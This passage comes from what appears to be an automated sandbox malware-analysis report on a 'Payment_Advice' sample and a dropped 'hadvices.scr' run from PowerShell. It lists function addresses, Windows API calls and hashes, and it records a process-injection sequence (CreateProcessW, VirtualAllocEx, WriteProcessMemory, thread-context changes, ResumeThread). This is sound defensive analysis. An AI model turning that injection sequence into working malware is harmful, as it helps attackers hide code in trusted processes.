Instruction Fuzzy Hash: 8CF0E2B35006017AC20067BAEC85CAB7B6CEF95370780023FF515D20D6EA38D81486A8

Uniqueness

Uniqueness Score: -1.00%

Function 0040AE76 Relevance: 6.3, APIs: 5, Instructions: 93COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040AF17
memset.MSVCRT ref: 0040AF20
memset.MSVCRT ref: 0040AF29
memset.MSVCRT ref: 0040AF36
memset.MSVCRT ref: 0040AF42

Part of subcall function 0040C276: memcpy.MSVCRT ref: 0040C2D0
Part of subcall function 0040C276: memcpy.MSVCRT ref: 0040C31F

Memory Dump Source

Source File: 00000002.00000002.2416511067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd

Similarity

API ID: memset$memcpy
String ID:
API String ID: 368790112-0
Opcode ID: 77a43cbbb6266ba10a119da92b1386f508399576c8cf03208af1230622900171
Instruction ID: ff3a12849f14474e25052ccd38566c33d2c186ec74ba694f67bf1beed8dc7c58
Opcode Fuzzy Hash: 77a43cbbb6266ba10a119da92b1386f508399576c8cf03208af1230622900171
Instruction Fuzzy Hash: 89212531B907086BE524AA29DC86F9F738CDB86708F50063EF201FA1C1D67DE54547AE

Uniqueness

Uniqueness Score: -1.00%

Function 00405B40 Relevance: 6.2, APIs: 4, Instructions: 167memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?), ref: 00405C0A
wcsncpy.MSVCRT ref: 00405C60

Memory Dump Source

Source File: 00000002.00000002.2416511067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd

Similarity

API ID: AllocateHeapwcsncpy
String ID:
API String ID: 1358295784-0
Opcode ID: dbefc154c3fd0c86216f953ee4b31303624e33edbc8c1b27b50f459021298698
Instruction ID: c1c3d513005c3c241562a142b51836119b7241697b797653b2b83cf70e1dc3f7
Opcode Fuzzy Hash: dbefc154c3fd0c86216f953ee4b31303624e33edbc8c1b27b50f459021298698
Instruction Fuzzy Hash: DF51C030508B069BDB209F28D844A6B77F4FF84348F544A2EFC45A72D0E779E905CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040D1BF Relevance: 6.1, APIs: 4, Instructions: 134memoryCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(?), ref: 0040D1D3
RtlAllocateHeap.NTDLL(00000000,?), ref: 0040D288
RtlAllocateHeap.NTDLL(00000000,?), ref: 0040D2AB
RtlLeaveCriticalSection.NTDLL(?), ref: 0040D303

Memory Dump Source

Source File: 00000002.00000002.2416511067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd

Similarity

API ID: AllocateCriticalHeapSection$EnterLeave
String ID:
API String ID: 3625150316-0
Opcode ID: c10679976362d654b585f1ec8b68fb6b9a3b4e8ac0eceb1a9ed7d32880a1cb5b
Instruction ID: a17e627e050f24daf4e0fc7d3c0e54bac809a59e300a572b9792337043ee6586
Opcode Fuzzy Hash: c10679976362d654b585f1ec8b68fb6b9a3b4e8ac0eceb1a9ed7d32880a1cb5b
Instruction Fuzzy Hash: B951E470A01B029FC728CFA9D580926B7F4FF587103158A7EE89AD7A50D334F959CB98

Uniqueness

Uniqueness Score: -1.00%

Function 004062B0 Relevance: 6.1, APIs: 4, Instructions: 90COMMON

Download Yara Rule

APIs

CharLowerW.USER32 ref: 004062D6
CharLowerW.USER32(00000000), ref: 00406310
CharLowerW.USER32(?), ref: 0040633F
CharLowerW.USER32(?), ref: 00406345

Memory Dump Source

Source File: 00000002.00000002.2416511067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd

Similarity

API ID: CharLower
String ID:
API String ID: 1615517891-0
Opcode ID: 7e3cda2dc92e76a3f7f6f8fc87e0455d9eabfe1fe7eb39cd3677ec52a9aeb089
Instruction ID: d067756844b34a6404b07e6cf1397282c6a25047d21fa5d7bde466b1de65efe4
Opcode Fuzzy Hash: 7e3cda2dc92e76a3f7f6f8fc87e0455d9eabfe1fe7eb39cd3677ec52a9aeb089
Instruction Fuzzy Hash: E42146756043058BC720EF5998405BBB7E4EB80760F86447AFC86A3380D638EE159BE9

Uniqueness

Uniqueness Score: -1.00%

Function 00409C83 Relevance: 6.1, APIs: 4, Instructions: 80memoryCOMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 00409CEB
RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 00409D01
wcscpy.MSVCRT ref: 00409D0C
memset.MSVCRT ref: 00409D3A

Memory Dump Source

Source File: 00000002.00000002.2416511067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd

Similarity

API ID: AllocateHeapmemsetwcscpywcslen
String ID:
API String ID: 2037025450-0
Opcode ID: a20fb1cacd0096f501daf125df341b11e239634ed8c318d74144b3a8a3b1d6da
Instruction ID: 3306218dfe6fd6935e1b76e0e8dc860d4400add17917e302399b454d6a157e83
Opcode Fuzzy Hash: a20fb1cacd0096f501daf125df341b11e239634ed8c318d74144b3a8a3b1d6da
Instruction Fuzzy Hash: A121F472504701AFD721AF65D840B6BB7E9EF88314F14892FF64562692CB39EC048B18

Uniqueness

Uniqueness Score: -1.00%

Function 00409A20 Relevance: 6.1, APIs: 4, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00409B0F: HeapFree.KERNEL32(00000000,?,?,00000200,?,?,00409A2F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200), ref: 00409B3A
Part of subcall function 00409B0F: HeapFree.KERNEL32(00000000,?,?,?,00409A2F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 00409B46
Part of subcall function 00409B0F: HeapFree.KERNEL32(00000000,?,?,?,?,00409A2F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200), ref: 00409B5A
Part of subcall function 00409B0F: HeapFree.KERNEL32(00000000,00000000,?,?,00409A2F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 00409B70

RtlAllocateHeap.NTDLL(00000000,0000003C,00000200), ref: 00409A3F
RtlAllocateHeap.NTDLL(00000008,00000015), ref: 00409A65
RtlAllocateHeap.NTDLL(00000008,FFFFFFED,FFFFFFED), ref: 00409AC2
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 00409ADC

Memory Dump Source

Source File: 00000002.00000002.2416511067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd

Similarity

API ID: Heap$Free$Allocate
String ID:
API String ID: 3472947110-0
Opcode ID: 8d405e1b173177ea89790586d235f10fc7f712f384bf1d367d23111c52829df9
Instruction ID: 4b0fe6378f6027ada2d8db74ddc61b51f9462678ded80081bad5b8da7f184a0e
Opcode Fuzzy Hash: 8d405e1b173177ea89790586d235f10fc7f712f384bf1d367d23111c52829df9
Instruction Fuzzy Hash: 11213A71701616ABD7109F2AEC41B56BFE8FF48710F51822AF608E76A1D771E821CF98

Uniqueness

Uniqueness Score: -1.00%

Function 0040DD70 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 0040DD85
RtlAllocateHeap.NTDLL(031E0000,00000000,0000000A), ref: 0040DDA9
RtlReAllocateHeap.NTDLL(031E0000,00000000,00000000,0000000A), ref: 0040DDCD
HeapFree.KERNEL32(031E0000,00000000), ref: 0040DE04

Memory Dump Source

Source File: 00000002.00000002.2416511067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd

Similarity

API ID: Heap$Allocate$Freewcslen
String ID:
API String ID: 584413571-0
Opcode ID: e9c6a98fdd6d39e9826194df6834ea9e2ef42813dacce9c02a3e8dca4dd637a1
Instruction ID: ec588af85dbfb1d608d0e9eea2fe4ccce556658423514a2897da8941eef92b66
Opcode Fuzzy Hash: e9c6a98fdd6d39e9826194df6834ea9e2ef42813dacce9c02a3e8dca4dd637a1
Instruction Fuzzy Hash: 1F211574604209EFCB15CF94D884FAABBB9FF49314F108169F9099B384D734EA41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00411B20 Relevance: 6.1, APIs: 4, Instructions: 60COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0040CCF8,00000000), ref: 00411B54
malloc.MSVCRT ref: 00411B64
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,00000000), ref: 00411B81
malloc.MSVCRT ref: 00411B96

Memory Dump Source

Source File: 00000002.00000002.2416511067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd

Similarity

API ID: ByteCharMultiWidemalloc
String ID:
API String ID: 2735977093-0
Opcode ID: cd29b8decd3b02952837749b88a0da1641af8608c001b95d219bbc5f6800fa44
Instruction ID: 6564459d5a016f80208b608040e38cd36fd424a6541425da5bf10ca2b0b8713f
Opcode Fuzzy Hash: cd29b8decd3b02952837749b88a0da1641af8608c001b95d219bbc5f6800fa44
Instruction Fuzzy Hash: 180164B734030537E3206655AC42FF7770DCBC1B99F19407AFB005E2C1E6ABA9028679

Uniqueness

Uniqueness Score: -1.00%

Function 00411BC0 Relevance: 6.1, APIs: 4, Instructions: 60COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00411BF1
malloc.MSVCRT ref: 00411C01
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00411C1B
malloc.MSVCRT ref: 00411C30

Memory Dump Source

Source File: 00000002.00000002.2416511067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd

Similarity

API ID: ByteCharMultiWidemalloc
String ID:
API String ID: 2735977093-0
Opcode ID: 5cf4b8a5cf85d4fe393516ff7cde79f9285f418483ef15bf1e3af7dcf68b9e2c
Instruction ID: e896c43596a717bc1e2b0c4b1148b765e438402798fd5a355992862dcf698edd
Opcode Fuzzy Hash: 5cf4b8a5cf85d4fe393516ff7cde79f9285f418483ef15bf1e3af7dcf68b9e2c
Instruction Fuzzy Hash: F401247B38031137E3205755AC42FA7774DCBC5B99F19447AFB016E2C0EAA7A9018AB8

Uniqueness

Uniqueness Score: -1.00%

Function 0040D0D8 Relevance: 6.1, APIs: 4, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(00000020), ref: 0040D0E3
RtlReAllocateHeap.NTDLL(00000008,?,?), ref: 0040D123
RtlLeaveCriticalSection.NTDLL(00000020), ref: 0040D15E

Part of subcall function 0040D7B2: RtlAllocateHeap.NTDLL(00000008,00000000,0040D02C), ref: 0040D7BE

Memory Dump Source

Source File: 00000002.00000002.2416511067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd

Similarity

API ID: AllocateCriticalHeapSection$EnterLeave
String ID:
API String ID: 3625150316-0
Opcode ID: 0a53241ca7917863c4c71313c068b37edaf5ef52ee66f23da44513a19d23a86b
Instruction ID: c489c2a9d7d615a57c1fefe1c5f7e248a1051b75451140994bda68c59ab12d69
Opcode Fuzzy Hash: 0a53241ca7917863c4c71313c068b37edaf5ef52ee66f23da44513a19d23a86b
Instruction Fuzzy Hash: 09112B32600601AFC7209F68EC40E56B7E9EB48321B15892EE596E76A0DB35F844CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040D31D Relevance: 6.0, APIs: 4, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(00000020), ref: 0040D32F
HeapFree.KERNEL32(00000000,?,?,00000000,00000200,0040D5FE,00000000,00000000,?,00409B28,?,00000200,?,?,00409A2F,00000200), ref: 0040D346
HeapFree.KERNEL32(00000000,?,?,00000000,00000200,0040D5FE,00000000,00000000,?,00409B28,?,00000200,?,?,00409A2F,00000200), ref: 0040D362
RtlLeaveCriticalSection.NTDLL(00000020), ref: 0040D37F

Memory Dump Source

Source File: 00000002.00000002.2416511067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd

Similarity

API ID: CriticalFreeHeapSection$EnterLeave
String ID:
API String ID: 1298188129-0
Opcode ID: d5ac81aa0c71ad19c1c4e0b2d6939d6c54ec4a5825a3dcbcded4acec7e2d012d
Instruction ID: c942d341990db50828fe86b1bb11e7c679014380f0fb6b5d63ada0bd3a9fdac0
Opcode Fuzzy Hash: d5ac81aa0c71ad19c1c4e0b2d6939d6c54ec4a5825a3dcbcded4acec7e2d012d
Instruction Fuzzy Hash: EB012875A0161AEFC7208F95ED0496BBBACFB08750306813AA814A7614C735F825CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00405430 Relevance: 6.0, APIs: 4, Instructions: 34threadCOMMON

Download Yara Rule

APIs

Part of subcall function 004053E4: RtlEnterCriticalSection.NTDLL(00417680), ref: 004053EF
Part of subcall function 004053E4: RtlLeaveCriticalSection.NTDLL(00417680), ref: 00405422

TerminateThread.KERNEL32(00000000,00000000,00000000,?,?,-0000012C,00401D21,00000000,-0000012C,00402464,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405440
RtlEnterCriticalSection.NTDLL(00417680), ref: 0040544C
CloseHandle.KERNEL32(-00000008,?,?,-0000012C,00401D21,00000000,-0000012C,00402464,00000000,00000001,00000000,00000000,00000000,00000002,00000000,00000000), ref: 0040546C

Part of subcall function 0040D772: HeapFree.KERNEL32(00000000,?,0040926D,004170C4,00000008,?,?,?,?,00408F50,00000000,00408B2A), ref: 0040D7AB

RtlLeaveCriticalSection.NTDLL(00417680), ref: 00405480

Memory Dump Source

Source File: 00000002.00000002.2416511067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd

Similarity

API ID: CriticalSection$EnterLeave$CloseFreeHandleHeapTerminateThread
String ID:
API String ID: 85618057-0
Opcode ID: b1167d0687bed46e093f8ab5fe460e6420eba81e54db401aeab1c784aeeec1fc
Instruction ID: c9816872bdd86c647b9bbb3b065009bce871534b551d6c686b05325cb1d870d8
Opcode Fuzzy Hash: b1167d0687bed46e093f8ab5fe460e6420eba81e54db401aeab1c784aeeec1fc
Instruction Fuzzy Hash: 16F0E232804710EBC6201B65AC48FDBBB78DF44723726883FF94573192C738A8808E6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040937A Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON

Download Yara Rule

APIs

Part of subcall function 0040CF28: TlsGetValue.KERNEL32(?,004094C5), ref: 0040CF2F
Part of subcall function 0040CF28: RtlAllocateHeap.NTDLL(00000008), ref: 0040CF4A
Part of subcall function 0040CF28: TlsSetValue.KERNEL32(00000000,?,?,004094C5), ref: 0040CF59

GetCommandLineW.KERNEL32(?,?,?,?,?,?,004094D8,00000000), ref: 00409394

Strings

", xrefs: 004093B6
, xrefs: 004093AE

Memory Dump Source

Source File: 00000002.00000002.2416511067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd

Similarity

API ID: Value$AllocateCommandHeapLine
String ID: $"
API String ID: 565049335-3817095088
Opcode ID: fa9a74e3e17bce1985ebad787626fd7ba31f7d8c6f90120e3196dee43f12beff
Instruction ID: 69e458bc51ecb7c25a8df227a80145383e7ec16cd8de15c0fb13cda22aad0e48
Opcode Fuzzy Hash: fa9a74e3e17bce1985ebad787626fd7ba31f7d8c6f90120e3196dee43f12beff
Instruction Fuzzy Hash: 1F31C37250C3218ADB749F54981227733A1EBA1B60F18813FE8926B3C2E3B94D42C769

Uniqueness

Uniqueness Score: -1.00%

Function 00409B0F Relevance: 5.0, APIs: 4, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00409D5A: memset.MSVCRT ref: 00409DC2

Part of subcall function 0040D586: RtlEnterCriticalSection.NTDLL(004175FC), ref: 0040D59A
Part of subcall function 0040D586: HeapFree.KERNEL32(00000000,?,?,00409B28,?,00000200,?,?,00409A2F,00000200,?,?,?,004010C3,00000004,00000015), ref: 0040D5E8
Part of subcall function 0040D586: RtlLeaveCriticalSection.NTDLL(004175FC), ref: 0040D5EF

HeapFree.KERNEL32(00000000,?,?,00000200,?,?,00409A2F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200), ref: 00409B3A
HeapFree.KERNEL32(00000000,?,?,?,00409A2F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 00409B46
HeapFree.KERNEL32(00000000,?,?,?,?,00409A2F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200), ref: 00409B5A
HeapFree.KERNEL32(00000000,00000000,?,?,00409A2F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 00409B70

Memory Dump Source

Source File: 00000002.00000002.2416511067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd

Similarity

API ID: FreeHeap$CriticalSection$EnterLeavememset
String ID:
API String ID: 4254243056-0
Opcode ID: b07a0de3bc2a029a6d32c3f1ef181170ed56332f7289932ba5d1534fa1d824b7
Instruction ID: 705666720bf26b0174e90ab05c41c8e8142486a7e985717f40232ec06a4cc210
Opcode Fuzzy Hash: b07a0de3bc2a029a6d32c3f1ef181170ed56332f7289932ba5d1534fa1d824b7
Instruction Fuzzy Hash: 36F0C931601515BFC7116B1AFD80D56BFADFF46798352822AB41462631C736FC219AA8

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: powershell.exePID: 3532, Parent PID: 2720COMMON

Executed Functions

Function 00007FFD348833B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2412488514.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd34880000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
Instruction ID: 5fffc6dc26c3eb99b3910d994459d48da0474aba520a49b72d272c666e07c8f2
Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
Instruction Fuzzy Hash: B501677121CB0D4FD744EF4CE451AA6B7E0FB99364F10056DE58AC3651DA36E882CB45

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: hadvices.scrPID: 8112, Parent PID: 3532COMMON

Execution Graph

Execution Coverage:	5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	25
Total number of Limit Nodes:	1

Executed Functions

Function 00DF9B1C Relevance: 1.7, APIs: 1, Instructions: 223
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00DFB729

Memory Dump Source

Source File: 0000000F.00000002.2330789597.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_df0000_hadvices.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 8b7fda733427ce4af1c010e733cfb939df4e9a4170aeac5a9c34832fb03522ad
Instruction ID: a47c953389adf1ab461bcc81e0bc49f966d3f44860a618a7a37001cb13228f7e
Opcode Fuzzy Hash: 8b7fda733427ce4af1c010e733cfb939df4e9a4170aeac5a9c34832fb03522ad
Instruction Fuzzy Hash: 6B81C274C0026DDFDF21CFA9C980BEDBBB5AB49300F1491AAE509B7260DB709A85CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00DFA600 Relevance: 1.6, APIs: 1, Instructions: 116
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00DFA6D3

Memory Dump Source

Source File: 0000000F.00000002.2330789597.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_df0000_hadvices.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 9b3b99a6fce026e2fca550929c52a0c74fe686d4601864261c1233ff3cd17cd9
Instruction ID: ca08812b990a61ecadc9c69d08ce45a418b21ee5e0ff2deefa4da1a280ca6e85
Opcode Fuzzy Hash: 9b3b99a6fce026e2fca550929c52a0c74fe686d4601864261c1233ff3cd17cd9
Instruction Fuzzy Hash: CC41A8B5D012589FDF00CFA9D980AEEBBF1BB49310F24902AE918B7200D775AA45CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00DF9B40 Relevance: 1.6, APIs: 1, Instructions: 103
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00DFBA35

Memory Dump Source

Source File: 0000000F.00000002.2330789597.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_df0000_hadvices.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 01d1365df2e82e12e1f0cac83f3857d003023d1c772deef98a6d0e4b756fb8cc
Instruction ID: 89cb626f0a603ea630720b3c56c19d3a7dc134dd7536d098c0bf81fff50597c8
Opcode Fuzzy Hash: 01d1365df2e82e12e1f0cac83f3857d003023d1c772deef98a6d0e4b756fb8cc
Instruction Fuzzy Hash: 8D4179B9D04258DFCF10CFAAD984AEEFBB1BB19310F14A06AE914B7210D375A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00DFA758 Relevance: 1.6, APIs: 1, Instructions: 101
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00DFA802

Memory Dump Source

Source File: 0000000F.00000002.2330789597.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_df0000_hadvices.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0be6db01a5f9e6388d3d4b89670085523e43788d5000febf8a2b9300cae63b09
Instruction ID: 5411992c24e76bb317c732bb56fa9d330e89b0fce550a8395ac6986286a99109
Opcode Fuzzy Hash: 0be6db01a5f9e6388d3d4b89670085523e43788d5000febf8a2b9300cae63b09
Instruction Fuzzy Hash: F93198B5D00258DFCF10CFA9D980A9EFBB1BF49310F10A42AE919B7210D775A901CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00DFA4D8 Relevance: 1.6, APIs: 1, Instructions: 94
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 00DFA587

Memory Dump Source

Source File: 0000000F.00000002.2330789597.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_df0000_hadvices.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 3d377211f29a95839528c2a089f4df14f4ec7d430dcb8bea40caeca5bb26f15f
Instruction ID: 0b1512acde89a6b8a781733eee89156c4b5879e1fc5027c02e77030f0d85b85f
Opcode Fuzzy Hash: 3d377211f29a95839528c2a089f4df14f4ec7d430dcb8bea40caeca5bb26f15f
Instruction Fuzzy Hash: 7A31BAB5D01259DFDB10CFAAD884AEEBBF1BF48310F24802AE418B7240D778A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00DF9B28 Relevance: 1.6, APIs: 1, Instructions: 91
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64GetThreadContext.KERNEL32(?,?), ref: 00DFB922

Memory Dump Source

Source File: 0000000F.00000002.2330789597.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_df0000_hadvices.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: c3d7bd52163ff40aba970ed72c28907a205a0324fa7d5f9d9ecff2b2bddbd3cb
Instruction ID: d1e4ff09663061128b5340309c0e3341706ee56047b58a15d64d2709027bd4d6
Opcode Fuzzy Hash: c3d7bd52163ff40aba970ed72c28907a205a0324fa7d5f9d9ecff2b2bddbd3cb
Instruction Fuzzy Hash: 5D319AB5D01258DFCB10CFAAD584AAEBBF5AB48314F24902AE514B7210D378A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00DFA878 Relevance: 1.6, APIs: 1, Instructions: 73
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE(?), ref: 00DFA8F6

Memory Dump Source

Source File: 0000000F.00000002.2330789597.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_df0000_hadvices.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: e63f726c93e9c58d91f7fb9ec759754a29301f4fbf743c4b75b0d2f2148798f9
Instruction ID: 621de15f9d75a7426091adbf1472679735fc39ec300da98a7229a6a47e1e9509
Opcode Fuzzy Hash: e63f726c93e9c58d91f7fb9ec759754a29301f4fbf743c4b75b0d2f2148798f9
Instruction Fuzzy Hash: 1831C9B4D012599FDF14CFAAD880AAEFBB4AF48310F14942AE919B7300C775A941CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00D5D5B8 Relevance: .1, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000F.00000002.2330431837.0000000000D5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D5D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_d5d000_hadvices.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e06b04756f46f84390941fcf10ebf819486201a14b7dbae4667c56f4775c6b8
Instruction ID: e36efdc7e98e32d2b0ba95519236c3cfe1bb5cb7a8095a7338efc004f6ab8a1b
Opcode Fuzzy Hash: 9e06b04756f46f84390941fcf10ebf819486201a14b7dbae4667c56f4775c6b8
Instruction Fuzzy Hash: 692145B6104208EFCF25DF10D9C0B26BF66FB94315F24816DED090B256C336D85ACAB1

Uniqueness

Uniqueness Score: -1.00%

Function 00D5D5B3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2330431837.0000000000D5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D5D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_d5d000_hadvices.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
Instruction ID: cf21eddf4f23a1a5961cb097e00bc66b8770d2b43a5e4d7cca2f4748920e296c
Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
Instruction Fuzzy Hash: 6511B176504284CFCF15CF10D5C4B16BF72FB94314F2886A9DC090B256C33AD85ACBA1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: hadvices.scrPID: 5648, Parent PID: 8112COMMON

Execution Graph

Execution Coverage:	11.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	8.6%
Total number of Nodes:	81
Total number of Limit Nodes:	8

Executed Functions

Function 05577988 Relevance: 2.0, APIs: 1, Instructions: 532
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000010.00000002.3365771620.0000000005570000.00000040.00000800.00020000.00000000.sdmp, Offset: 05570000, based on PE: false

Joe Sandbox IDA Plugin

